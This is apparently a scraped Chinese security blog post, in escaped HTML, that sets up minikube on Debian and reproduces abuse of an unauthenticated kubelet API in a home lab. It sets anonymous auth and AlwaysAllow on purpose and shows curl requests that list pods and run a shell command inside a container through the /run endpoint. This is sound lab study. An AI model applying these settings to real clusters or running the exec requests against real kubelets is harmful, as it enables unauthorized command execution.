# https:\/\/kubernetes.io\/docs\/tasks\/tools\/install-kubectl\/#install-kubectl-on-linux \nsudo apt-get update && sudo apt-get install -y apt-transport-https\ncurl -s https:\/\/packages.cloud.google.com\/apt\/doc\/apt-key.gpg | sudo apt-key add -\necho \"deb https:\/\/apt.kubernetes.io\/ kubernetes-xenial main\" | sudo tee -a \/etc\/apt\/sources.list.d\/kubernetes.list\nsudo apt-get update\nsudo apt-get install -y kubectl<\/code><\/pre>\n\n\n\n2. Install minikube<\/p>\n\n\n\n
curl -LO https:\/\/storage.googleapis.com\/minikube\/releases\/latest\/minikube_1.6.1.deb \\\n && sudo dpkg -i minikube_1.6.1.deb<\/code><\/pre>\n\n\n\n3. Install Driver (Optinal)<\/p>\n\n\n\n
https:\/\/kubernetes.io\/docs\/setup\/learning-environment\/minikube\/#specifying-the-vm-driver<\/a><\/p>\n\n\n\n\u786e\u8ba4\u5b89\u88c5\uff1a<\/p>\n\n\n\n
root@debian10:~# minikube start --vm-driver=none\n* minikube v1.6.1 on Debian 10.2\n* Selecting 'none' driver from user configuration (alternates: [])\n* Tip: Use 'minikube start -p <name>' to create a new cluster, or 'minikube delete' to delete this one.\n* Starting existing none VM for \"minikube\" ...\n* Waiting for the host to be provisioned ...\n! VM may be unable to resolve external DNS records\n* Preparing Kubernetes v1.17.0 on Docker '19.03.0' ...\n* Downloading kubeadm v1.17.0\n* Downloading kubelet v1.17.0\n* Launching Kubernetes ...\n\n* Configuring local host environment ...\n*\n! The 'none' driver provides limited isolation and may reduce system security and reliability.\n! For more information, see:\n - https:\/\/minikube.sigs.k8s.io\/docs\/reference\/drivers\/none\/\n*\n! kubectl and minikube configuration will be stored in \/root\n! To use kubectl or minikube commands as your own user, you may need to relocate them. For example, to overwrite your own settings, run:\n*\n - sudo mv \/root\/.kube \/root\/.minikube $HOME\n - sudo chown -R $USER $HOME\/.kube $HOME\/.minikube\n*\n* This can also be done automatically by setting the env var CHANGE_MINIKUBE_NONE_USER=true\n* Done! kubectl is now configured to use \"minikube\"\nroot@debian10:~#\nroot@debian10:~# minikube status\nhost: Running\nkubelet: Running\napiserver: Running\nkubeconfig: Configured\nroot@debian10:~# minikube stop\n* Stopping \"minikube\" in none ...\n* Stopping \"minikube\" in none ...\n* \"minikube\" stopped.\nroot@debian10:~#<\/code><\/pre>\n\n\n\n\u914d\u7f6e\u53ef\u8bbf\u95eeapi,\u7f16\u8f91\/var\/lib\/kubelet\/config.yaml \u6587\u4ef6\uff0c\u628aanonymous auth\u6539\u6210true,authorization mode\u6539\u6210AlwaysAllow<\/p>\n\n\n\n
\u91cd\u542f\uff1a<\/p>\n\n\n\n
sudo systemctl daemon-reload\nsudo systemctl restart kubelet.service<\/code><\/pre>\n\n\n\n\u786e\u8ba4\u53ef\u4ee5\u8bbf\u95ee\uff1a<\/p>\n\n\n\n
curl -k https:\/\/localhost:10250\/runningpods\/<\/code><\/pre>\n\n\n\n\u542f\u52a8\uff08VMware\u4e2d\u865a\u62df\u673a\u4e0a\u7684Debian10\uff09\uff1a<\/p>\n\n\n\n
# minikube start --vm-driver=none\nkubectl create deployment kubernetes-bootcamp --image=gcr.io\/google-samples\/kubernetes-bootcamp:v1\nkubectl get deployments\necho -e \"\\n\\n\\n\\e[92mStarting Proxy. After starting it will not output a response. Please click the first Terminal Tab\\n\";\nkubectl proxy<\/code><\/pre>\n\n\n\n\u6253\u5f00\u65b0\u7ec8\u7aef\uff0c\u786e\u8ba4\u90e8\u7f72\u6210\u529f\uff1a<\/p>\n\n\n\n
export POD_NAME=$(kubectl get pods -o go-template --template '{{range .items}}{{.metadata.name}}{{\"\\n\"}}{{end}}')\necho Name of the Pod: $POD_NAME\ncurl http:\/\/localhost:8001\/api\/v1\/namespaces\/default\/pods\/$POD_NAME\/proxy\/<\/code><\/pre>\n\n\n\n\u53e6\u4e00\u4e9b\u67e5\u770b\u7684\u547d\u4ee4\uff1a<\/p>\n\n\n\n
kubectl get pod\nkubectl describe pods\nkubectl get services\nkubectl get pods --all-namespaces\nkubectl get deployments\nminikube service $POD_NAME --url\nkubectl delete services $POD_NAME\nkubectl delete deployment $POD_NAME\nminikube stop\nminikube delete<\/code><\/pre>\n\n\n\n\u6267\u884c\u547d\u4ee4\u7684\u683c\u5f0f\u662f\uff1a<\/p>\n\n\n\n
# \/run\/%namespace%\/%pod_name%\/%container_name%<\/code><\/pre>\n\n\n\n\u6240\u4ee5\u6267\u884c\u547d\u4ee4\u8981\u83b7\u5f97 namespace\uff0c pod_name\uff0c container_name\u8fd9\u4e09\u4e2a\u6570\u636e\uff1a<\/p>\n\n\n\n
curl -k https:\/\/192.168.23.134:10250\/runningpods\/\ncurl -k https:\/\/192.168.23.134:10250\/pods\/<\/code><\/pre>\n\n\n\n\u83b7\u53d6\u540e\u5728\u5bb9\u5668\u91cc\u6267\u884c\u547d\u4ee4\uff1a<\/p>\n\n\n\n
curl -k -XPOST \"https:\/\/192.168.23.134:10250\/run\/default\/kubernetes-bootcamp-69fbc6f4cf-82lk2\/kubernetes-bootcamp\" -d \"cmd=ls -ahl\"<\/code><\/pre>\n\n\n\n![\"\"](\"https:\/\/blog.73007300.xyz\/wp-content\/uploads\/2019\/12\/image-10.png\")
<\/figure>\n\n\n\n\u81f3\u4e8e\u5982\u4f55\u9003\u9038\u5bb9\u5668\uff0c\u90a3\u5c31\u8981\u8ba8\u8bbaDocker\u4e86\u3002\u6682\u4e0d\u8ba8\u8bba\u3002<\/p>\n\n\n\n
\u53c2\u8003\uff1a<\/p>\n\n\n\n
https:\/\/carnal0wnage.attackresearch.com\/2019\/01\/kubernetes-unauth-kublet-api-10250.html<\/a><\/p>\n\n\n\nhttps:\/\/kubernetes.io\/docs\/tasks\/tools\/install-kubectl\/#install-kubectl-on-linux<\/a><\/p>\n\n\n\n